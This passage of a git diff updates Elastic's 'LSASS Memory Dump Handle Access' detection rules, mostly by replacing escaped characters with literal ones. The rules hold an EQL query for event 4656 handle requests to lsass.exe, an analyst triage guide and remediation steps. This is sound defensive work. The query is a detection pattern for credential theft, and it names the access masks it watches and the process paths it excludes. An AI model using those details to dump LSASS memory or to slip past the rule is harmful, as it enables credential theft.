[ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json index bde9738ae4e..00b8247fd47 100644 --- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", @@ -72,7 +72,7 @@ ], "risk_score": 73, "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json index d7da21fbcb0..7a11aff5423 100644 --- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json index 360d5197c2a..2c7cff2594f 100644 --- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the 